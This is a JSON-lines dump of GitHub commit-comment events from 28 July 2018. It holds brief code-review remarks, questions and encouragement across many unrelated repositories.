{"id":"8032408594","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29868902,"position":1,"line":1,"path":".gitignore","commit_id":"2643ff9b41a93765d1173c9e39d30e169c0ab827","created_at":"2018-07-28T15:03:47Z","updated_at":"2018-07-28T15:03:47Z","author_association":"OWNER","body":"I'm using WebStorm devloped by JetBrain, so...\r\nMaybe I should create a repository for different `.gitignore` files."}},"created_at":"2018-07-28T15:03:47Z"}
{"id":"8032410194","type":"CommitCommentEvent","actor":{"login":"malexandreb"},"repo":{"name":"malexandreb/tonneau"},"payload":{"comment":{"id":29868908,"position":69,"line":341,"path":"Tonneau.ino","commit_id":"53df20b3024d7e4d783e4e60b4333b19d4f54980","created_at":"2018-07-28T15:04:56Z","updated_at":"2018-07-28T15:04:56Z","author_association":"OWNER","body":"after 50 days currentmilli goes to 0, need to account for it"}},"created_at":"2018-07-28T15:04:56Z"}
{"id":"8032410789","type":"CommitCommentEvent","actor":{"login":"jnavila"},"repo":{"name":"progit/progit2-fr"},"payload":{"comment":{"id":29868910,"position":null,"line":null,"path":null,"commit_id":"818def5aefc5d526a16900d80e84915800d55aa2","created_at":"2018-07-28T15:05:21Z","updated_at":"2018-07-28T15:05:21Z","author_association":"MEMBER","body":"Ah oui. C'est bizarre que ça n'apparaisse que maintenant."}},"created_at":"2018-07-28T15:05:21Z"}
{"id":"8032411845","type":"CommitCommentEvent","actor":{"login":"malexandreb"},"repo":{"name":"malexandreb/tonneau"},"payload":{"comment":{"id":29868913,"position":120,"line":541,"path":"Tonneau.ino","commit_id":"53df20b3024d7e4d783e4e60b4333b19d4f54980","created_at":"2018-07-28T15:06:07Z","updated_at":"2018-07-28T15:06:07Z","author_association":"OWNER","body":"needs to be write"}},"created_at":"2018-07-28T15:06:07Z"}
{"id":"8032414567","type":"CommitCommentEvent","actor":{"login":"fincs"},"repo":{"name":"switchbrew/libnx"},"payload":{"comment":{"id":29868917,"position":4,"line":434,"path":"nx/source/services/fs.c","commit_id":"18a841c8504efd64c5ace9e897795953a69ec026","created_at":"2018-07-28T15:08:03Z","updated_at":"2018-07-28T15:08:03Z","author_association":"CONTRIBUTOR","body":"Coding standard, and it makes it clearer that it's zerofilled."}},"created_at":"2018-07-28T15:08:03Z"}
{"id":"8032415562","type":"CommitCommentEvent","actor":{"login":"davidanthoff"},"repo":{"name":"mpastell/Weave.jl"},"payload":{"comment":{"id":29868922,"position":null,"line":null,"path":null,"commit_id":"a5ba74dcd1f87e4b0585646cd657dd2e9d5b00c3","created_at":"2018-07-28T15:08:46Z","updated_at":"2018-07-28T15:08:46Z","author_association":"CONTRIBUTOR","body":"I believe the official recommendation at this point is to not use Project.toml files at all at this point, but stick with REQUIRE files, until there will be a mass auto PR that migrated things over. "}},"created_at":"2018-07-28T15:08:46Z"}
{"id":"8032416961","type":"CommitCommentEvent","actor":{"login":"Jinxzone"},"repo":{"name":"Jinxzone/cracked-and-hacked-"},"payload":{"comment":{"id":29868929,"position":null,"line":null,"path":null,"commit_id":"01496870f75c5f7b22816d18d2cbaa04d5343951","created_at":"2018-07-28T15:09:51Z","updated_at":"2018-07-28T15:09:51Z","author_association":"OWNER","body":"Understand that I have to live with it. So many years. "}},"created_at":"2018-07-28T15:09:51Z"}
{"id":"8032420811","type":"CommitCommentEvent","actor":{"login":"janosvitok"},"repo":{"name":"mcallegari/qlcplus"},"payload":{"comment":{"id":29868939,"position":null,"line":null,"path":null,"commit_id":"252578b93bf0bfc51cf61a515759fa1dd269ee13","created_at":"2018-07-28T15:12:27Z","updated_at":"2018-07-28T15:12:27Z","author_association":"CONTRIBUTOR","body":"Yes, that looks like it. OR: `source.red() * filter.red() / 255`.\r\n\r\nI've checked sources, the colors are stored as shorts, and red() returns `ct.argb.red >> 8`, while refF() returns `ct.argb.red / qreal(USHRT_MAX)` which means the integer version might be faster (one division) and the float a bit more precise. Ideally the operation should be done on the internal components (`ct.argb.red * ct.argb.red / USHRT_MAX`) but that would require some hacking..."}},"created_at":"2018-07-28T15:12:27Z"}
{"id":"8032420961","type":"CommitCommentEvent","actor":{"login":"ForserX"},"repo":{"name":"xrOxygen/xray-oxygen"},"payload":{"comment":{"id":29868940,"position":null,"line":null,"path":null,"commit_id":"aa7143a10385bc20ec74f137c37c57c60f114de4","created_at":"2018-07-28T15:12:34Z","updated_at":"2018-07-28T15:12:34Z","author_association":"MEMBER","body":"It's dev brach. There may be a non-working code. "}},"created_at":"2018-07-28T15:12:34Z"}
{"id":"8032421296","type":"CommitCommentEvent","actor":{"login":"weirdan"},"repo":{"name":"phpactor/completion"},"payload":{"comment":{"id":29868941,"position":null,"line":null,"path":null,"commit_id":"6fa0580d70eebb4166a7a361e6b8381dc7b2ad23","created_at":"2018-07-28T15:12:49Z","updated_at":"2018-07-28T15:12:49Z","author_association":"NONE","body":"phpactor/completion#11"}},"created_at":"2018-07-28T15:12:49Z"}
{"id":"8032423789","type":"CommitCommentEvent","actor":{"login":"MatthewKush"},"repo":{"name":"xrOxygen/xray-oxygen"},"payload":{"comment":{"id":29868953,"position":null,"line":null,"path":null,"commit_id":"aa7143a10385bc20ec74f137c37c57c60f114de4","created_at":"2018-07-28T15:14:35Z","updated_at":"2018-07-28T15:14:35Z","author_association":"NONE","body":"Oh yeah XD Groovy. "}},"created_at":"2018-07-28T15:14:35Z"}
{"id":"8032424065","type":"CommitCommentEvent","actor":{"login":"Kronuz"},"repo":{"name":"xapian/xapian"},"payload":{"comment":{"id":29868954,"position":null,"line":null,"path":null,"commit_id":"3d1771612c97823d14adf4a3579e7942e7c839fb","created_at":"2018-07-28T15:14:48Z","updated_at":"2018-07-28T15:14:48Z","author_association":"CONTRIBUTOR","body":"Do you think we could backport this to 1.4.7?"}},"created_at":"2018-07-28T15:14:48Z"}
{"id":"8032426204","type":"CommitCommentEvent","actor":{"login":"oldmud0"},"repo":{"name":"elfmonster/AO2-Client"},"payload":{"comment":{"id":29868962,"position":14,"line":19,"path":"main.cpp","commit_id":"65750f66ce68279e557c61cc1f8bfb5458bbfbcc","created_at":"2018-07-28T15:16:22Z","updated_at":"2018-07-28T15:16:22Z","author_association":"NONE","body":"I don't know what version you are finding this plugin from, but you better be careful as Qt dropped APNG support a very long time ago due to a lack of maintainers to fix security issues."}},"created_at":"2018-07-28T15:16:22Z"}
{"id":"8032429359","type":"CommitCommentEvent","actor":{"login":"Namdrib"},"repo":{"name":"Namdrib/java-minesweeper"},"payload":{"comment":{"id":29868968,"position":null,"line":null,"path":null,"commit_id":"5b86f0770b9dfa3b6fc4e16a15bfb3daf5ec452e","created_at":"2018-07-28T15:18:42Z","updated_at":"2018-07-28T15:18:42Z","author_association":"OWNER","body":"Issue #11 "}},"created_at":"2018-07-28T15:18:42Z"}
{"id":"8032429524","type":"CommitCommentEvent","actor":{"login":"jayarjo"},"repo":{"name":"mobxjs/mobx-state-tree"},"payload":{"comment":{"id":29868970,"position":41,"line":436,"path":"packages/mobx-state-tree/src/types/complex-types/model.ts","commit_id":"1dfe7f4d691b2febe7d9c1fc5ff52157d22d39e2","created_at":"2018-07-28T15:18:49Z","updated_at":"2018-07-28T15:18:49Z","author_association":"MEMBER","body":"if callback doesn't explicitly request two arguments (`newValue` and `oldValue`) give it full change object"}},"created_at":"2018-07-28T15:18:49Z"}
{"id":"8032429739","type":"CommitCommentEvent","actor":{"login":"yeomann"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29868971,"position":null,"line":null,"path":null,"commit_id":"30044fd531c22c4c5e8f1ede206fa7c2c3fd3aa8","created_at":"2018-07-28T15:18:58Z","updated_at":"2018-07-28T15:18:58Z","author_association":"NONE","body":"still not working in android? 😞 "}},"created_at":"2018-07-28T15:18:58Z"}
{"id":"8032430727","type":"CommitCommentEvent","actor":{"login":"mnakachi"},"repo":{"name":"mnakachi/website"},"payload":{"comment":{"id":29868982,"position":1,"line":1,"path":"lipsum.txt","commit_id":"14296c483e4501207ae62fcd6a91cac33b248d78","created_at":"2018-07-28T15:19:41Z","updated_at":"2018-07-28T15:19:41Z","author_association":"OWNER","body":"## Why Lipsum"}},"created_at":"2018-07-28T15:19:41Z"}
{"id":"8032446930","type":"CommitCommentEvent","actor":{"login":"ceefit"},"repo":{"name":"AnthonyMaz/fileOrganize"},"payload":{"comment":{"id":29869038,"position":30,"line":30,"path":"fileorganize.py","commit_id":"161e51d0dcd56288812544895d2d15d7d08fce4a","created_at":"2018-07-28T15:30:54Z","updated_at":"2018-07-28T15:30:54Z","author_association":"COLLABORATOR","body":"Make this a command-line argument to select what directory to scan"}},"created_at":"2018-07-28T15:30:54Z"}
{"id":"8032449291","type":"CommitCommentEvent","actor":{"login":"Mrleon1"},"repo":{"name":"Mrleon1/Mycode-ACM-ICPC"},"payload":{"comment":{"id":29869041,"position":null,"line":null,"path":null,"commit_id":"6d20e7214d547c67f3a740bc025d96afb3ec793f","created_at":"2018-07-28T15:32:25Z","updated_at":"2018-07-28T15:32:25Z","author_association":"OWNER","body":"add some files"}},"created_at":"2018-07-28T15:32:25Z"}
{"id":"8032449456","type":"CommitCommentEvent","actor":{"login":"ceefit"},"repo":{"name":"AnthonyMaz/fileOrganize"},"payload":{"comment":{"id":29869042,"position":6,"line":6,"path":"fileorganize.py","commit_id":"161e51d0dcd56288812544895d2d15d7d08fce4a","created_at":"2018-07-28T15:32:33Z","updated_at":"2018-07-28T15:32:33Z","author_association":"COLLABORATOR","body":"[Progressive](https://pypi.org/project/progressive/) is prettier"}},"created_at":"2018-07-28T15:32:33Z"}
{"id":"8032449690","type":"CommitCommentEvent","actor":{"login":"jeancarpc"},"repo":{"name":"jeancarpc/Guia-de-iniciante"},"payload":{"comment":{"id":29869043,"position":7,"line":6,"path":"README.md","commit_id":"694698fc63647f69b59d8ebb9d7f2c4c543605be","created_at":"2018-07-28T15:32:43Z","updated_at":"2018-07-28T15:32:43Z","author_association":"OWNER","body":"Criando um novo ramo"}},"created_at":"2018-07-28T15:32:43Z"}
{"id":"8032450111","type":"CommitCommentEvent","actor":{"login":"Raymondgrc"},"repo":{"name":"ShardeDeLane/Lambda-Hello"},"payload":{"comment":{"id":29869044,"position":3,"line":3,"path":"bio.txt","commit_id":"0b1946190c80293651370b749a50e6e8b7928f4a","created_at":"2018-07-28T15:33:03Z","updated_at":"2018-07-28T15:33:03Z","author_association":"NONE","body":"Great job on this mini project, give Saga a pet for me :+1: "}},"created_at":"2018-07-28T15:33:03Z"}
{"id":"8032451563","type":"CommitCommentEvent","actor":{"login":"Raymondgrc"},"repo":{"name":"CJAponte/Lambda-Hello"},"payload":{"comment":{"id":29869049,"position":6,"line":6,"path":"CesarA.txt","commit_id":"e08d378799b5a6f11a7c0263d886022940fa6336","created_at":"2018-07-28T15:34:06Z","updated_at":"2018-07-28T15:34:06Z","author_association":"NONE","body":"Lol, I like your bio! Good job on this assignment!"}},"created_at":"2018-07-28T15:34:06Z"}
{"id":"8032451909","type":"CommitCommentEvent","actor":{"login":"jherzig"},"repo":{"name":"jherzig/REST_SENSOR"},"payload":{"comment":{"id":29869051,"position":null,"line":null,"path":null,"commit_id":"b5b853a8e206802b02e9580df1e66bf82451fc89","created_at":"2018-07-28T15:34:21Z","updated_at":"2018-07-28T15:34:21Z","author_association":"OWNER","body":"Hallo Welt "}},"created_at":"2018-07-28T15:34:21Z"}
{"id":"8032452416","type":"CommitCommentEvent","actor":{"login":"patloks12"},"repo":{"name":"patloks12/WARSZTAT_1_CSharp"},"payload":{"comment":{"id":29869056,"position":null,"line":null,"path":null,"commit_id":"f75580bb9f5a29db11c96f3f4938b16856d3ab0b","created_at":"2018-07-28T15:34:43Z","updated_at":"2018-07-28T15:34:43Z","author_association":"OWNER","body":"@pwasilewski-netcode To juz wysyłałem na slacku, ale dam tu też dla pewności :)"}},"created_at":"2018-07-28T15:34:43Z"}
{"id":"8032452476","type":"CommitCommentEvent","actor":{"login":"avadhootkulkarni"},"repo":{"name":"avadhootkulkarni/EthBtcPriceBot"},"payload":{"comment":{"id":29869059,"position":null,"line":null,"path":null,"commit_id":"c69c18cc6c8bdfb8f1d345bf528c67f2b73d7a09","created_at":"2018-07-28T15:34:45Z","updated_at":"2018-07-28T15:34:45Z","author_association":"OWNER","body":"Resources"}},"created_at":"2018-07-28T15:34:45Z"}
{"id":"8032452715","type":"CommitCommentEvent","actor":{"login":"klzchz"},"repo":{"name":"umeetsolucoes/erika-bolos"},"payload":{"comment":{"id":29869060,"position":null,"line":null,"path":null,"commit_id":"d06755fef16df3526e7aaee64d2b72dc4074474c","created_at":"2018-07-28T15:34:55Z","updated_at":"2018-07-28T15:34:55Z","author_association":"CONTRIBUTOR","body":"you should remove that... will be a bug"}},"created_at":"2018-07-28T15:34:55Z"}
{"id":"8032452860","type":"CommitCommentEvent","actor":{"login":"jaresty"},"repo":{"name":"cloudfoundry/bosh"},"payload":{"comment":{"id":29869061,"position":null,"line":null,"path":null,"commit_id":"7fb072cd2617a2f53807703e37265a78224d671c","created_at":"2018-07-28T15:35:02Z","updated_at":"2018-07-28T15:35:02Z","author_association":"MEMBER","body":"Not sure I understand the question? I'm also not sure I have much context\non this commit...\n2018年7月28日(土) 8:26 Chris Dutra <notifications@github.com>:\n\n> Could this script be replaces with the current terraform provider we're\n> using to build the database?\n>\n> https://www.terraform.io/docs/providers/google/r/sql_database_instance.html#ca_certificate\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/cloudfoundry/bosh/commit/7fb072cd2617a2f53807703e37265a78224d671c#commitcomment-29869009>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABQMNH0__DxuIRLWmUSEm6R3HY5Mbi3Gks5uLIKOgaJpZM4VlFGh>\n> .\n>\n"}},"created_at":"2018-07-28T15:35:02Z"}
{"id":"8032453092","type":"CommitCommentEvent","actor":{"login":"alexmozzhakov"},"repo":{"name":"An0nUD4Y/SocialFish"},"payload":{"comment":{"id":29869062,"position":null,"line":null,"path":null,"commit_id":"376a50d757e7b0c7c58b862e5b33956581e09ae7","created_at":"2018-07-28T15:35:12Z","updated_at":"2018-07-28T15:35:12Z","author_association":"COLLABORATOR","body":"🤔 "}},"created_at":"2018-07-28T15:35:12Z"}
{"id":"8032453229","type":"CommitCommentEvent","actor":{"login":"Raymondgrc"},"repo":{"name":"davereichardt/Lambda-Hello"},"payload":{"comment":{"id":29869063,"position":3,"line":3,"path":"DavidR.txt","commit_id":"278361cdf335563437e7c41873d5ba816baa4d8d","created_at":"2018-07-28T15:35:17Z","updated_at":"2018-07-28T15:35:17Z","author_association":"NONE","body":"Thanks for sharing, David! Good job on this assignment!"}},"created_at":"2018-07-28T15:35:17Z"}
{"id":"8032453562","type":"CommitCommentEvent","actor":{"login":"SethTisue"},"repo":{"name":"scala/community-builds"},"payload":{"comment":{"id":29869065,"position":5,"line":290,"path":"configs/community.dbuild","commit_id":"758798f133ede39b8a7933e014b78d237ce40d30","created_at":"2018-07-28T15:35:31Z","updated_at":"2018-07-28T15:35:31Z","author_association":"MEMBER","body":"@xuwei-k yes, thank you, scala/community-builds@39def9396134c80ae2a067a3d36d37ca6c996db6. and also https://github.com/scala/scala-collection-compat/pull/119"}},"created_at":"2018-07-28T15:35:31Z"}
{"id":"8032455827","type":"CommitCommentEvent","actor":{"login":"EndLess728"},"repo":{"name":"AEXmod/platform_packages_apps_Dialer"},"payload":{"comment":{"id":29869077,"position":null,"line":null,"path":null,"commit_id":"fb733dce7f47c02fbc1f57f3f24560e03a5ba8b2","created_at":"2018-07-28T15:37:09Z","updated_at":"2018-07-28T15:37:09Z","author_association":"NONE","body":"Thanx alot bro, u are great <3 "}},"created_at":"2018-07-28T15:37:09Z"}
{"id":"8032456873","type":"CommitCommentEvent","actor":{"login":"Aliwee"},"repo":{"name":"WangYang-wy/LeetCode"},"payload":{"comment":{"id":29869080,"position":null,"line":null,"path":null,"commit_id":"6cce5389f6facb6b9ccdd89bf0acb5552ab2cc6e","created_at":"2018-07-28T15:37:54Z","updated_at":"2018-07-28T15:37:54Z","author_association":"NONE","body":"有志者，事竟成。\r\n相信你，加油ヾ(◍°∇°◍)ﾉﾞ"}},"created_at":"2018-07-28T15:37:54Z"}
{"id":"8032456966","type":"CommitCommentEvent","actor":{"login":"Raymondgrc"},"repo":{"name":"davereichardt/Lambda-Hello"},"payload":{"comment":{"id":29869083,"position":2,"line":2,"path":"DavidR.txt","commit_id":"e836dd03b882b6838122cd7e0022708a3c7b2104","created_at":"2018-07-28T15:37:58Z","updated_at":"2018-07-28T15:37:58Z","author_association":"NONE","body":"This doesn't sound like the David I know. Great job on the stretch!"}},"created_at":"2018-07-28T15:37:58Z"}
{"id":"8032457968","type":"CommitCommentEvent","actor":{"login":"klzchz"},"repo":{"name":"umeetsolucoes/erika-bolos"},"payload":{"comment":{"id":29869087,"position":null,"line":null,"path":null,"commit_id":"4a5dac1b9aff5ac03723f00eaab589f5b7ce37a0","created_at":"2018-07-28T15:38:44Z","updated_at":"2018-07-28T15:38:44Z","author_association":"CONTRIBUTOR","body":"better"}},"created_at":"2018-07-28T15:38:44Z"}
{"id":"8032460066","type":"CommitCommentEvent","actor":{"login":"jsolman"},"repo":{"name":"aphtoken/aph-wallet-gui"},"payload":{"comment":{"id":29869093,"position":21,"line":588,"path":"src/renderer/services/dex.js","commit_id":"c1c85590203274a3c2b35398e2e99724ba2f7778","created_at":"2018-07-28T15:40:19Z","updated_at":"2018-07-28T15:40:19Z","author_association":"CONTRIBUTOR","body":"What if order.price is null here?"}},"created_at":"2018-07-28T15:40:19Z"}
{"id":"8032460228","type":"CommitCommentEvent","actor":{"login":"Ro008"},"repo":{"name":"Ro008/website-test"},"payload":{"comment":{"id":29869094,"position":4,"line":10,"path":"index.html","commit_id":"6d0f1f86b04e22936494597e66246493d5910996","created_at":"2018-07-28T15:40:25Z","updated_at":"2018-07-28T15:40:25Z","author_association":"OWNER","body":"genial aportación!"}},"created_at":"2018-07-28T15:40:25Z"}
{"id":"8032460351","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29869095,"position":null,"line":null,"path":null,"commit_id":"d89ff118761ef9dc4c24344fd8a8d55156157027","created_at":"2018-07-28T15:40:30Z","updated_at":"2018-07-28T15:40:30Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [033 - Criar ChangeSet para Pessoa e Tipo Pessoa](https://trello.com/c/fpRmiKTb/41-033-criar-changeset-para-pessoa-e-tipo-pessoa)"}},"created_at":"2018-07-28T15:40:30Z"}
{"id":"8032463222","type":"CommitCommentEvent","actor":{"login":"lychees"},"repo":{"name":"Andoromeda-Foundation/lost-in-nebulas"},"payload":{"comment":{"id":29869101,"position":13,"line":284,"path":"lost_in_nebulas.js","commit_id":"ddd215a59941caeb5163577bba4e159f95a89371","created_at":"2018-07-28T15:42:32Z","updated_at":"2018-07-28T15:42:32Z","author_association":"CONTRIBUTOR","body":"We should use dividedBy here."}},"created_at":"2018-07-28T15:42:32Z"}
{"id":"8032466794","type":"CommitCommentEvent","actor":{"login":"Quinn-Donnelly"},"repo":{"name":"Quinn-Donnelly/projectOne"},"payload":{"comment":{"id":29869116,"position":null,"line":null,"path":null,"commit_id":"b4c778f2a1a2660cae4c70155bd1f0c920fb1f1e","created_at":"2018-07-28T15:45:10Z","updated_at":"2018-07-28T15:45:10Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Build out Backend SQL](https://trello.com/c/XPsD1M9M/9-build-out-backend-sql)"}},"created_at":"2018-07-28T15:45:10Z"}
{"id":"8032468511","type":"CommitCommentEvent","actor":{"login":"Mrleon1"},"repo":{"name":"Mrleon1/Mycode-ACM-ICPC"},"payload":{"comment":{"id":29869122,"position":null,"line":null,"path":null,"commit_id":"d104bad65c10a1dbfb8b9c0edfe44431b90c2417","created_at":"2018-07-28T15:46:20Z","updated_at":"2018-07-28T15:46:20Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-28T15:46:20Z"}
{"id":"8032469262","type":"CommitCommentEvent","actor":{"login":"Raymondgrc"},"repo":{"name":"juliejonak/Lambda-Hello"},"payload":{"comment":{"id":29869123,"position":8,"line":5,"path":"JulieJ.txt","commit_id":"108394cc294d39623bea10930a04fc344bd8a3fa","created_at":"2018-07-28T15:46:55Z","updated_at":"2018-07-28T15:46:55Z","author_association":"NONE","body":"Good job on your separate branch, Julie. professional bachata sounds like fun!"}},"created_at":"2018-07-28T15:46:55Z"}
{"id":"8032470300","type":"CommitCommentEvent","actor":{"login":"mdbeacham"},"repo":{"name":"mdbeacham/test"},"payload":{"comment":{"id":29869124,"position":null,"line":null,"path":null,"commit_id":"55f9fe4b347f456d6c1a98127c7d76ad6187a037","created_at":"2018-07-28T15:47:44Z","updated_at":"2018-07-28T15:47:44Z","author_association":"OWNER","body":"test\r\n"}},"created_at":"2018-07-28T15:47:44Z"}
{"id":"8032470711","type":"CommitCommentEvent","actor":{"login":"Munter"},"repo":{"name":"webpack/webpack.js.org"},"payload":{"comment":{"id":29869125,"position":22,"line":10,"path":".travis.yml","commit_id":"03e0dcffa2a9b9763d9a28383752b367e6f201cd","created_at":"2018-07-28T15:48:02Z","updated_at":"2018-07-28T15:48:02Z","author_association":"COLLABORATOR","body":"If I understand the script correctly it has two stages:\r\n- Check the API to list all repos of certain accounts. Filter the results by a provided pattern. Output a list of repo slugs (`webpack-contrib/...`)\r\n- Download each of the README's of each of the repositories we have matched on.\r\n\r\nIf we split this up:\r\n- Manually run the API scraping/filtering --> list of repo slugs --> included_repos.json (version controlled)\r\n- Download each of the README's from included_repos.json (never hits the API)\r\n\r\nThis would mean a maintainer could update the list of repos once in a while, thus only hitting the API and count towards the rate limit when these runs are done manually.\r\n\r\nThe fetching of the README's is free from an API perspective, because we just GET them from the public raw source"}},"created_at":"2018-07-28T15:48:02Z"}
{"id":"8032471037","type":"CommitCommentEvent","actor":{"login":"gusbemacbe"},"repo":{"name":"highlightjs/highlight.js"},"payload":{"comment":{"id":29869126,"position":106,"line":139,"path":"src/languages/logtalk.js","commit_id":"76bbe72372c9db9227aad2b5ad30d802fcdd2e42","created_at":"2018-07-28T15:48:15Z","updated_at":"2018-07-28T15:48:15Z","author_association":"CONTRIBUTOR","body":"Please, only alias. Not more than aliases. "}},"created_at":"2018-07-28T15:48:15Z"}
{"id":"8032473120","type":"CommitCommentEvent","actor":{"login":"jsolman"},"repo":{"name":"aphtoken/aph-wallet-gui"},"payload":{"comment":{"id":29869131,"position":35,"line":621,"path":"src/renderer/services/dex.js","commit_id":"c1c85590203274a3c2b35398e2e99724ba2f7778","created_at":"2018-07-28T15:49:42Z","updated_at":"2018-07-28T15:49:42Z","author_association":"CONTRIBUTOR","body":"Shouldn’t this be using Math.ceil"}},"created_at":"2018-07-28T15:49:42Z"}
{"id":"8032473567","type":"CommitCommentEvent","actor":{"login":"Raymondgrc"},"repo":{"name":"juliejonak/Lambda-Hello"},"payload":{"comment":{"id":29869137,"position":null,"line":null,"path":null,"commit_id":"857dd4a11735147fb7749d7b4dafe152110a81b5","created_at":"2018-07-28T15:50:01Z","updated_at":"2018-07-28T15:50:01Z","author_association":"NONE","body":"I like that you used git amend. How did it work for you?"}},"created_at":"2018-07-28T15:50:01Z"}
{"id":"8032474222","type":"CommitCommentEvent","actor":{"login":"ChillerDragon"},"repo":{"name":"ChillerDragon/DDNetPP"},"payload":{"comment":{"id":29869138,"position":null,"line":null,"path":null,"commit_id":"b3d6d134314a2e4bc7ddf6ba7b4e9cf7eac08087","created_at":"2018-07-28T15:50:18Z","updated_at":"2018-07-28T15:50:18Z","author_association":"OWNER","body":"@fokkonaut idk? Any ideas. We could give them the date of the update or leave it NULL like it is now to now they are too old for the date feature."}},"created_at":"2018-07-28T15:50:18Z"}
{"id":"8032477952","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29869145,"position":10,"line":989,"path":"github-dark.css","commit_id":"789fe73b9aef1976c883f562dfef44bf417a96c1","created_at":"2018-07-28T15:52:43Z","updated_at":"2018-07-28T15:52:43Z","author_association":"MEMBER","body":"`!important;` ?"}},"created_at":"2018-07-28T15:52:43Z"}
{"id":"8032478576","type":"CommitCommentEvent","actor":{"login":"InfusOnWoW"},"repo":{"name":"WeakAuras/WeakAuras2"},"payload":{"comment":{"id":29869148,"position":22,"line":4762,"path":"WeakAuras/WeakAuras.lua","commit_id":"7882b8435f40bc21762c6d7b2e4c41a84b337557","created_at":"2018-07-28T15:53:10Z","updated_at":"2018-07-28T15:53:10Z","author_association":"CONTRIBUTOR","body":"This should not be necessary as it is set to 0 later."}},"created_at":"2018-07-28T15:53:10Z"}
{"id":"8032478727","type":"CommitCommentEvent","actor":{"login":"InfusOnWoW"},"repo":{"name":"WeakAuras/WeakAuras2"},"payload":{"comment":{"id":29869149,"position":25,"line":4765,"path":"WeakAuras/WeakAuras.lua","commit_id":"7882b8435f40bc21762c6d7b2e4c41a84b337557","created_at":"2018-07-28T15:53:17Z","updated_at":"2018-07-28T15:53:17Z","author_association":"CONTRIBUTOR","body":"return here?"}},"created_at":"2018-07-28T15:53:17Z"}
{"id":"8032479741","type":"CommitCommentEvent","actor":{"login":"InfusOnWoW"},"repo":{"name":"WeakAuras/WeakAuras2"},"payload":{"comment":{"id":29869160,"position":8,"line":4738,"path":"WeakAuras/WeakAuras.lua","commit_id":"7882b8435f40bc21762c6d7b2e4c41a84b337557","created_at":"2018-07-28T15:54:00Z","updated_at":"2018-07-28T15:54:00Z","author_association":"CONTRIBUTOR","body":"Can replace the else here with a end, for simpler code."}},"created_at":"2018-07-28T15:54:00Z"}
{"id":"8032480216","type":"CommitCommentEvent","actor":{"login":"Raymondgrc"},"repo":{"name":"kyleteeter/Lambda-Hello"},"payload":{"comment":{"id":29869164,"position":null,"line":null,"path":null,"commit_id":"1dbf661b1ddab53a5f83bb94e895f26a25ccbaa2","created_at":"2018-07-28T15:54:19Z","updated_at":"2018-07-28T15:54:19Z","author_association":"NONE","body":"Great job on the stretch, Kyle! Archery sounds like fun."}},"created_at":"2018-07-28T15:54:19Z"}
{"id":"8032481612","type":"CommitCommentEvent","actor":{"login":"InfusOnWoW"},"repo":{"name":"WeakAuras/WeakAuras2"},"payload":{"comment":{"id":29869174,"position":24,"line":4764,"path":"WeakAuras/WeakAuras.lua","commit_id":"7882b8435f40bc21762c6d7b2e4c41a84b337557","created_at":"2018-07-28T15:55:19Z","updated_at":"2018-07-28T15:55:19Z","author_association":"CONTRIBUTOR","body":"Can't happen. The first if checks is true if time.count is ~= 1, the second if is true if time.count is 1"}},"created_at":"2018-07-28T15:55:19Z"}
{"id":"8032482331","type":"CommitCommentEvent","actor":{"login":"henrydvq"},"repo":{"name":"rusCom/Taximeter"},"payload":{"comment":{"id":29869175,"position":null,"line":null,"path":null,"commit_id":"1f5ca6c4725509644281e543b10d26a67aef3380","created_at":"2018-07-28T15:55:50Z","updated_at":"2018-07-28T15:55:50Z","author_association":"NONE","body":"Dear friend, how can I get in touch with you? Greetings from Peru."}},"created_at":"2018-07-28T15:55:50Z"}
{"id":"8032483108","type":"CommitCommentEvent","actor":{"login":"ccamara"},"repo":{"name":"ccamara/hovercraft"},"payload":{"comment":{"id":29869180,"position":null,"line":null,"path":null,"commit_id":"4a579db11d81d8bcc95f79963b2dab16004bf0ba","created_at":"2018-07-28T15:56:24Z","updated_at":"2018-07-28T15:56:24Z","author_association":"OWNER","body":"Source: https://github.com/regebro/hovercraft/issues/154#issuecomment-408597290"}},"created_at":"2018-07-28T15:56:24Z"}
{"id":"8032484005","type":"CommitCommentEvent","actor":{"login":"agvikas"},"repo":{"name":"agvikas/neural-style-transfer-TF"},"payload":{"comment":{"id":29869182,"position":null,"line":null,"path":null,"commit_id":"522c4c9f906fa3758d899021a6d6436a0298f1bf","created_at":"2018-07-28T15:57:02Z","updated_at":"2018-07-28T15:57:02Z","author_association":"OWNER","body":"required packages"}},"created_at":"2018-07-28T15:57:02Z"}
{"id":"8032488354","type":"CommitCommentEvent","actor":{"login":"sashaba"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29869206,"position":null,"line":null,"path":null,"commit_id":"0d43751cabad7270d5f773005b3b20d17e078b62","created_at":"2018-07-28T16:00:07Z","updated_at":"2018-07-28T16:00:07Z","author_association":"NONE","body":"@CFKevinRef that PR would be great, hope you make it. If you don’t mind, may I ask you which file of code push did you modify? \r\nThanks."}},"created_at":"2018-07-28T16:00:07Z"}
{"id":"8032492027","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29869217,"position":null,"line":null,"path":null,"commit_id":"69f643f66eb415df061f3071b77cec8b474a29c4","created_at":"2018-07-28T16:02:20Z","updated_at":"2018-07-28T16:02:20Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [034 - Criar ChangeSet para Telefone](https://trello.com/c/jVJq78oi/42-034-criar-changeset-para-telefone)"}},"created_at":"2018-07-28T16:02:20Z"}
